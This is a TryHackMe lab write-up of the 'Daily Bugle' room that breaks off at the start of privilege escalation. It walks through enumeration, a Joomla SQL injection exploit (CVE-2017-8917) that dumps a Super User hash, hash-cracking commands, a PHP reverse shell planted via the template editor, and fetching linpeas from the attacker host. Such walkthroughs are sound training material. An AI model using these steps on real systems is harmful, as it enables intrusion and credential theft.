# TryHackMe Daily Bugle

## **Goal: Get to Root!**

### **1. Gaining shell**

Starting the room, I began with a quick default-port nmap scan; I learned from an earlier mistake that waiting on a full 65535-port scan before doing anything else is not smart. Note that `-sN` is a TCP Null scan, so open ports can only be reported as `open|filtered`; the version scan below is what confirms they are actually open.

```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sN  10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:41 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
3306/tcp open|filtered mysql
```

After that I ran a version and script scan against the three ports, followed by a fast full-port sweep:

```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306  10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:42 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (99%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.4 (96%), Linux 3.10 - 3.13 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 3.10 - 4.11 (94%), Linux 5.0 - 5.14 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   110.89 ms 10.17.0.1 (10.17.0.1)
2   ... 4
5   260.96 ms 10.10.161.209 (10.10.161.209)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.68 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sN -p- -T4 --min-rate 8000 10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:47 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
3306/tcp open|filtered mysql

Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds
```

With this I saved a bunch of time waiting on ports: the full 65535-port Null scan with `--min-rate 8000` finished in about ten seconds and found nothing beyond 22, 80 and 3306.

I also ran gobuster against the web root:

```shell
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209 -w /usr/share/wordlists/dirb/common.txt -x .php -t 40  

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.161.209
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php        (Status: 403) [Size: 215]
/.htaccess            (Status: 403) [Size: 211]
/.hta                 (Status: 403) [Size: 206]
/.htaccess.php        (Status: 403) [Size: 215]
/.htpasswd            (Status: 403) [Size: 211]
/.hta.php             (Status: 403) [Size: 210]
/administrator        (Status: 301) [Size: 243] [--> http://10.10.161.209/administrator/]
/bin                  (Status: 301) [Size: 233] [--> http://10.10.161.209/bin/]
/cache                (Status: 301) [Size: 235] [--> http://10.10.161.209/cache/]
/cgi-bin/             (Status: 403) [Size: 210]
/components           (Status: 301) [Size: 240] [--> http://10.10.161.209/components/]
/configuration.php    (Status: 200) [Size: 0]
/images               (Status: 301) [Size: 236] [--> http://10.10.161.209/images/]
/includes             (Status: 301) [Size: 238] [--> http://10.10.161.209/includes/]
/index.php            (Status: 200) [Size: 9280]
/index.php            (Status: 200) [Size: 9280]
/language             (Status: 301) [Size: 238] [--> http://10.10.161.209/language/]
/layouts              (Status: 301) [Size: 237] [--> http://10.10.161.209/layouts/]
/libraries            (Status: 301) [Size: 239] [--> http://10.10.161.209/libraries/]
/media                (Status: 301) [Size: 235] [--> http://10.10.161.209/media/]
/modules              (Status: 301) [Size: 237] [--> http://10.10.161.209/modules/]
/plugins              (Status: 301) [Size: 237] [--> http://10.10.161.209/plugins/]
/robots.txt           (Status: 200) [Size: 836]
/templates            (Status: 301) [Size: 239] [--> http://10.10.161.209/templates/]
/tmp                  (Status: 301) [Size: 233] [--> http://10.10.161.209/tmp/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
```

Some interesting things right here: a Joomla install (`/administrator`, `/components`, `/templates`), a `robots.txt` that advertises the admin path, and `/configuration.php` returning 200 with size 0 (the file exists but produces no output, so nothing leaks from it directly).

TryHackMe also hints at:

```tips
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
```

So I immediately visited each enumerated directory to see what was going on; only two render as actual pages:

```url
http://10.10.161.209/
```

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FG4RuRUZOZBqWd6Wio5nR%2FPasted%20image%2020250531185729.png?alt=media&#x26;token=dfa931f8-95ad-4813-be8e-cf2d723099e7" alt=""><figcaption></figcaption></figure>

and the administrator login:

```url
http://10.10.161.209/administrator/
```

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FJNTP4tl0Zqsnshpu34MJ%2FPasted%20image%2020250531182859.png?alt=media&#x26;token=e2072954-dfe0-46d7-a3db-256383fa6306" alt=""><figcaption></figcaption></figure>

I captured a login request to each of these two forms and tossed them at sqlmap:

```shell
┌──(kali㉿kali)-[~]
└─$ sqlmap -r request-daily-bungle2.txt -p username,password --dbms=MariaDB --dump

...

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:56:01 /2025-05-31/

[14:56:01] [INFO] parsing HTTP request from 'request-daily-bungle2.txt'
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the GET
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the Cookie
[14:56:01] [INFO] testing connection to the target URL
got a 303 redirect to 'http://10.10.161.209/index.php/component/users/?view=login&Itemid=101'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[14:56:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:56:14] [INFO] testing if the target URL content is stable
[14:56:16] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[14:56:17] [INFO] testing for SQL injection on POST parameter 'username'
[14:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:56:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:56:22] [INFO] testing 'Generic inline queries'
[14:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:56:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:56:26] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)                                                                                                                          
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[14:56:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:02] [WARNING] POST parameter 'username' does not seem to be injectable
[14:57:03] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[14:57:03] [INFO] testing for SQL injection on POST parameter 'password'
[14:57:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:57:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:57:08] [INFO] testing 'Generic inline queries'
[14:57:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:57:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:57:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:23] [WARNING] POST parameter 'password' does not seem to be injectable
[14:57:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 14:57:23 /2025-05-31/

```

Doesn't look promising. The login form itself is not injectable, at least not at the default `--level`/`--risk`.

OK, so let's check whether TryHackMe left us any hints:

```hints
What is the Joomla version?
```

I immediately opened:

```url
view-source:http://10.10.161.209/administrator/
```

Scrolling around I saw this:

```html
<html lang="en-gb" dir="ltr">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<meta charset="utf-8" />
	<meta name="description" content="New York City tabloid newspaper" />
	<meta name="generator" content="Joomla! - Open Source Content Management" />
	<title>The Daily Bugle - Administration</title>
	<link href="/administrator/templates/isis/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
	<link href="/administrator/templates/isis/css/template.css?787ff2be3d28e0eefd8e0930f878dbca" rel="stylesheet" />
	<style>

	@media (max-width: 480px) {
		.view-login .container {
			margin-top: -170px;
		}
		.btn {
			font-size: 13px;
			padding: 4px 10px 4px;
		}
	}
	</style>
	<script type="application/json" class="joomla-script-options new">{"system.keepalive":{"interval":840000,"uri":"\/administrator\/index.php"}}</script>
	<script src="/media/system/js/core.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?787ff2be3d28e0eefd8e0930f878dbca"></script><![endif]-->
	<script src="/media/system/js/keepalive.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery-noconflict.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/jquery-migrate.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<script src="/media/jui/js/bootstrap.min.js?787ff2be3d28e0eefd8e0930f878dbca"></script>
	<!--[if lt IE 9]><script src="/media/jui/js/html5.js?787ff2be3d28e0eefd8e0930f878dbca"></script><![endif]-->
	<script>
jQuery(function($){ $(".hasTooltip").tooltip({"html": true,"container": "body"}); });
	</script>

</head>
<body class="site com_login view-login layout-default task- itemid- ">
	<!-- Container -->
	<div class="container">
		<div id="content">
			<!-- Begin Content -->
			<div id="element-box" class="login well">
									<img src="/administrator/templates/isis/images/joomla.png" alt="The Daily Bugle" />
								<hr />
				<div id="system-message-container">
	</div>
```

Notice these two:

```url
<link href="/administrator/templates/isis/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
...
...
<img src="/administrator/templates/isis/images/joomla.png" alt="The Daily Bugle" />
```

I tried visiting:

```url
http://10.10.161.209/administrator/templates/isis/images/
```

And it's ACCESSIBLE: Apache directory indexing is enabled, so any directory without an index file lists its contents, which makes the whole install browsable.

I then went back to gobuster, this time against `/administrator/`:

```shell
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209/administrator/ -w /usr/share/wordlists/dirb/common.txt -x .php -t 50  

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.161.209/administrator/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php        (Status: 403) [Size: 229]
/.htaccess.php        (Status: 403) [Size: 229]
/.htpasswd            (Status: 403) [Size: 225]
/.hta                 (Status: 403) [Size: 220]
/.hta.php             (Status: 403) [Size: 224]
/.htaccess            (Status: 403) [Size: 225]
/cache                (Status: 301) [Size: 249] [--> http://10.10.161.209/administrator/cache/]
/components           (Status: 301) [Size: 254] [--> http://10.10.161.209/administrator/components/]
/help                 (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/help/]
/includes             (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/includes/]
/index.php            (Status: 200) [Size: 4846]
/index.php            (Status: 200) [Size: 4846]
/language             (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/language/]
/logs                 (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/logs/]
/modules              (Status: 301) [Size: 251] [--> http://10.10.161.209/administrator/modules/]
/templates            (Status: 301) [Size: 253] [--> http://10.10.161.209/administrator/templates/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
```

Looks familiar? Go back to the nmap result and you can see the same list in `robots.txt`:

```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306  10.10.161.209

...
...

80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
```

Each of these directories is browsable, so I walked through them looking for manifest XML files that carry a version number, and found:

#### **First URL:**

```url
http://10.10.161.209/administrator/modules/mod_stats_admin/mod_stats_admin.xml
```

Shows:

```html
<extension type="module" version="3.1" client="administrator" method="upgrade">
<name>mod_stats_admin</name>
<author>Joomla! Project</author>
<creationDate>July 2004</creationDate>
<copyright>
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>MOD_STATS_XML_DESCRIPTION</description>
```

#### **Second URL:**

```url
http://10.10.161.209/administrator/components/com_admin/admin.xml
```

Shows:

```html
<extension type="component" version="3.1" method="upgrade">
<name>com_admin</name>
<author>Joomla! Project</author>
<creationDate>April 2006</creationDate>
<copyright>
(C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>3.0.0</version>
<description>COM_ADMIN_XML_DESCRIPTION</description>
<media/>
<administration>
<files folder="admin">
<filename>admin.php</filename>
<filename>controller.php</filename>
<folder>helpers</folder>
<folder>models</folder>
<folder>views</folder>
</files>
<languages folder="admin">
<language tag="en-GB">language/en-GB.com_admin.ini</language>
<language tag="en-GB">language/en-GB.com_admin.sys.ini</language>
</languages>
</administration>
</extension>
```

#### **Third URL:**

```url
http://10.10.161.209/administrator/language/en-GB/en-GB.xml
```

Shows:

```html
<metafile version="3.7" client="administrator">
<name>English (en-GB)</name>
<version>3.7.0</version>
<creationDate>April 2017</creationDate>
<author>Joomla! Project</author>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
</copyright>
<license>
GNU General Public License version 2 or later; see LICENSE.txt
</license>
<description>en-GB administrator language</description>
<metadata>
<name>English (en-GB)</name>
<nativeName>English (United Kingdom)</nativeName>
<tag>en-GB</tag>
<rtl>0</rtl>
<locale>
en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom
</locale>
<firstDay>0</firstDay>
<weekEnd>0,6</weekEnd>
<calendar>gregorian</calendar>
</metadata>
<params/>
```

### ***THE CORRECT ANSWER IS 3.7.0***

Why?

According to a friend:

#### Why the **language-pack XML** gives the right Joomla version while the others don’t

| Manifest you looked at | What its `<version>` actually means | Why it’s **not** the core CMS version |
| --- | --- | --- |
| `administrator/modules/mod_stats_admin/mod_stats_admin.xml`, `administrator/components/com_admin/admin.xml` | Version of **that single module / component** (both happen to be *3.0.0* because they were created when Joomla 3 was first released). | Each extension keeps its **own** changelog. They don’t bump every time the CMS does. |
| `administrator/language/en-GB/en-GB.xml` | Version of the **entire language pack build** that ships with *each* Joomla release. | Joomla ships a **new language pack for every point release**, so its number always mirrors the **core** version (here *3.7.0*). |

**How the numbering works**

1. **Extension manifests** (`<extension …> … <version>X.Y.Z</version>`)\
   *X.Y.Z* is just the maintainer’s semantic version for that **plugin / module / component**.\
   It will stay at 3.0.0 until that specific extension changes.
2. **Schema attribute** (`<extension type="module" version="3.1">`)\
   The `version="3.1"` up top is **the manifest-schema version**, not Joomla’s release.
3. **Language-pack manifest** (`<metafile version="3.7"> … <version>3.7.0</version>`)\
   The language files are rebuilt and re-tagged **every time Joomla is tagged**.\
   So if the site is updated to 3.7.5 you’d see `3.7.5` there.

Because every Joomla installation **must** have at least one language pack—and that pack’s\
version is bumped **in lock-step with the core**—grabbing the value from\
`administrator/language/<lang>/<lang>.xml` is the most reliable passive way to fingerprint the running Joomla version.

That’s why TryHackMe expected **3.7.0**: it’s the number that reflects the core build, not the frozen extension numbers you saw first.

***
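To make that distinction concrete, here is an added example (not code from the original writeup or from Joomla): a small Python fingerprinter that parses the manifests above, separates the root element's `version=` schema attribute from the `<version>` element, and only trusts the core or language-pack manifest. The embedded XML is trimmed from the responses shown above. `administrator/manifests/files/joomla.xml` is assumed here to be Joomla's core manifest (it was not checked on this target), and `fetch_manifests` is the live equivalent against a base URL.

```python
"""Joomla version fingerprinting from unauthenticated manifest XML.

Added example, not code from the original writeup or from Joomla.
Applies the rule the table above describes: the root element's
version= attribute is the manifest schema, an extension's <version>
is that extension's own release, and only the core or language-pack
manifest tracks the CMS release.
"""
import sys
import xml.etree.ElementTree as ET
from urllib.request import urlopen

# Paths a Joomla 3.x site serves without authentication. Assumption:
# joomla.xml is Joomla's core manifest; it was not checked on the target.
CORE_MANIFEST = "administrator/manifests/files/joomla.xml"
LANG_MANIFEST = "administrator/language/en-GB/en-GB.xml"
EXT_MANIFEST = "administrator/modules/mod_stats_admin/mod_stats_admin.xml"

# Constructed sample input: trimmed from the responses shown above.
SAMPLE_MANIFESTS = {
    EXT_MANIFEST: """<extension type="module" version="3.1" client="administrator" method="upgrade">
<name>mod_stats_admin</name>
<version>3.0.0</version>
</extension>""",
    LANG_MANIFEST: """<metafile version="3.7" client="administrator">
<name>English (en-GB)</name>
<version>3.7.0</version>
</metafile>""",
}


def parse_manifest(xml_text):
    """Split a manifest into root tag, schema version and element version."""
    root = ET.fromstring(xml_text.strip())
    version_el = root.find("version")
    version = version_el.text.strip() if version_el is not None and version_el.text else None
    return {
        "root": root.tag,                       # "extension" or "metafile"
        "schema_version": root.get("version"),  # manifest schema, not the CMS
        "version": version,                     # what this manifest describes
    }


def fingerprint(manifests):
    """Best estimate of the core release from a {path: xml_text} mapping.

    Prefers the core manifest, then the language pack. Extension
    manifests are ignored: their <version> is frozen at the extension's
    own release (3.0.0 above) regardless of the CMS version.
    """
    for path in (CORE_MANIFEST, LANG_MANIFEST):
        if path in manifests:
            info = parse_manifest(manifests[path])
            if info["version"]:
                return info["version"], path
    return None, None


def fetch_manifests(base_url, paths=(CORE_MANIFEST, LANG_MANIFEST, EXT_MANIFEST), timeout=10):
    """Live equivalent: GET each manifest, keeping the ones that parse as XML."""
    found = {}
    for path in paths:
        try:
            with urlopen(base_url.rstrip("/") + "/" + path, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
            ET.fromstring(body.strip())  # reject HTML error pages
            found[path] = body
        except Exception:  # 404, connection error or non-XML body
            continue
    return found


if __name__ == "__main__":
    data = fetch_manifests(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_MANIFESTS
    for path, xml in data.items():
        print(path, parse_manifest(xml))
    print("core release:", fingerprint(data))
```

Run it with no arguments to see the sample manifests classified, or with `http://10.10.161.209/` as the first argument to fetch them live; an extension manifest on its own yields no core version, which is exactly the trap in the first two URLs above.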

Cool. Back to gaining a foothold. Joomla 3.7.0 is the release affected by CVE-2017-8917, an unauthenticated SQL injection in `com_fields`, and searching for it I found this:

```url
https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py
```

Very convenient. So let's run it:

```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ python2 joomblah.py http://10.10.161.209/

...
...

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

```

There we got the Super User `jonah` and the hash `$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm`.

This is a bcrypt hash (`$2y$`, cost factor 10), so it cannot be decrypted, only cracked or looked up. I checked it against `https://hashes.com/en/decrypt/hash`, which already had it, and got the password.
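For the case where the lookup service does not already know the hash, here is an added example (not code from the original writeup) that identifies the recovered hash, pulls out its cost and salt, and emits the hashcat/john command lines for an offline wordlist attack. It also handles Joomla's older `md5:salt` format, which can be verified with the standard library alone; the tool flags, mode numbers and the `rockyou.txt` path are my assumptions about current tool versions and a Kali install.

```python
"""Identify the recovered Joomla hash and build the offline cracking job.

Added example, not code from the original writeup. The hash is the one
joomblah extracted above. Nothing here "decrypts" it: bcrypt is a salted,
cost-parameterised one-way function, so the options are a lookup service
(as used above) or a wordlist attack with john/hashcat. Tool flags and the
hashcat/john mode names are assumptions about current tool versions.
"""
import hashlib
import re

JONAH_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"

# Modular-crypt bcrypt: $2a|2b|2y$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
# Joomla legacy (pre-bcrypt) format: hex(md5(password + salt)) ":" salt
LEGACY_RE = re.compile(r"^([0-9a-f]{32}):([A-Za-z0-9]{1,32})$")


def identify(h):
    """Classify a Joomla password hash and return its parts and crack modes."""
    m = BCRYPT_RE.match(h)
    if m:
        cost = int(m.group(2))
        return {
            "scheme": "bcrypt",
            "variant": m.group(1),
            "cost": cost,
            "rounds": 2 ** cost,      # key-setup iterations per guess: why it is slow
            "salt": m.group(3),
            "digest": m.group(4),
            "hashcat_mode": 3200,     # bcrypt $2*$, Blowfish (Unix)
            "john_format": "bcrypt",
        }
    m = LEGACY_RE.match(h)
    if m:
        return {
            "scheme": "joomla-md5",
            "digest": m.group(1),
            "salt": m.group(2),
            "hashcat_mode": 11,       # Joomla < 2.5.18: md5($pass.$salt)
            "john_format": "dynamic_1",
        }
    raise ValueError("unrecognised hash format: %r" % h)


def crack_commands(h, hash_file="jonah.hash", wordlist="/usr/share/wordlists/rockyou.txt"):
    """Return the hashcat and john command lines for this hash type."""
    info = identify(h)
    return [
        "hashcat -m %d -a 0 %s %s" % (info["hashcat_mode"], hash_file, wordlist),
        "john --format=%s --wordlist=%s %s" % (info["john_format"], wordlist, hash_file),
    ]


def make_legacy_hash(password, salt):
    """Build a legacy-format Joomla hash (used only to construct test data)."""
    return hashlib.md5((password + salt).encode()).hexdigest() + ":" + salt


def check_legacy(h, candidate):
    """Verify a candidate against a legacy md5:salt hash with the stdlib only.

    bcrypt verification needs the third-party `bcrypt` module, which is why
    the bcrypt branch above hands off to hashcat/john instead.
    """
    info = identify(h)
    if info["scheme"] != "joomla-md5":
        raise ValueError("only the legacy format is verifiable here")
    return hashlib.md5((candidate + info["salt"]).encode()).hexdigest() == info["digest"]


if __name__ == "__main__":
    print(identify(JONAH_HASH))
    for cmd in crack_commands(JONAH_HASH):
        print(cmd)
```

The `rounds` value is the point to notice: cost 10 means 1024 key-setup iterations per guess, so a bcrypt wordlist run is orders of magnitude slower than the legacy MD5 format and a lookup service is worth trying first, as the writeup did.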

Now if we log in to the public site:

```url
http://10.10.161.209
```

we don't see much.

But if we log in to:

```url
http://10.10.161.209/administrator/
```

we get the admin panel, since `jonah` is a Super User:

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FN2q3mFML1iFS5bc90A6N%2FPasted%20image%2020250531185218.png?alt=media&#x26;token=af713bde-727c-4eab-aff3-1f515a637b3b" alt=""><figcaption></figcaption></figure>

Next I tried the Metasploit module for CVE-2017-8917 (`https://www.exploit-db.com/exploits/44358`):

```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ msfconsole
...
...
msf6 > use exploit/unix/webapp/joomla_comfields_sqli_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > options
...
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set RHOSTS 10.10.161.209
RHOSTS => 10.10.161.209
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set LHOST [YOUR IP]
LHOST => [YOUR IP]
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > run
[*] Started reverse TCP handler on [YOUR IP]:4444 
[-] Exploit aborted due to failure: unknown: 10.10.161.209:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > check
[*] 10.10.161.209:80 - The target is not exploitable.
...
```

The module's `check` reports "not exploitable", but joomblah had just pulled the users table through the same bug, so this is a false negative from the module's table-prefix detection, not evidence that the host is patched. Either way we need another route to code execution.

No worries: we are now a Joomla Super User, so we can plant a shell ourselves through the template editor.

Now if you go to the admin panel:

<figure><img src="https://2237635920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsqRDWHkWdxahOJoG5Uc5%2Fuploads%2FG4RuRUZOZBqWd6Wio5nR%2FPasted%20image%2020250531185729.png?alt=media&#x26;token=dfa931f8-95ad-4813-be8e-cf2d723099e7" alt=""><figcaption></figcaption></figure>

Choose template:

```url
http://10.10.161.209/administrator/index.php?option=com_templates&view=templates
```

Choose Beez3:

```url
http://10.10.161.209/administrator/index.php?option=com_templates&view=template&id=503&file=aG9tZQ==
```

And choose: Editor -> html -> modules.php

Set up our netcat listener:

```shell
nc -lvnp 4444
```

Edit the file, paste a PHP reverse shell pointing at your listener, press Save, then use the template preview (or request the site) so the edited PHP is executed. The shell comes back as the web server user, `apache`:

```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.161.209] 42262
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 05:21:30 up  1:52,  0 users,  load average: 0.01, 0.04, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ cd /tmp
```

We got our reverse shell!

### **2. Privilege Escalation**

Let's serve linpeas.sh from the attack box with Python's built-in HTTP server and fetch it on the target:

```shell
python3 -m http.server 80
```

Then:

```shell
bash-4.2$ wget http://[YOUR IP]:80/linpeas.sh
wget http://[YOUR IP]:80/linpeas.sh
--2025-05-31 05:30:36--  http://[YOUR IP]/linpeas.sh
Connecting to [YOUR IP]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839046 (819K) [text/x-sh]
Saving to: 'linpeas.sh'

100%[======================================>] 839,046      253KB/s   in 3.2s   

2025-05-31 05:30:40 (253 KB/s) - 'linpeas.sh' saved [839046/839046]

bash-4.2$ chmod 777 linpeas.sh
chmod 777 linpeas.sh
bash-4.2$ ./linpeas.sh
```

Earlier, TryHackMe hinted that the privilege escalation involves yum, so the first thing to check is whether the current user can run yum through sudo without a password:

```shell
bash-4.2$ sudo -n -l
sudo -n -l
sudo: a password is required
```

`sudo -n` is non-interactive, so this tells us `apache` has no password-less sudo entry; we need another user's credentials. Luckily, linpeas pulled a database password out of the Joomla config:

```shell
╔══════════╣ Searching passwords in config PHP files
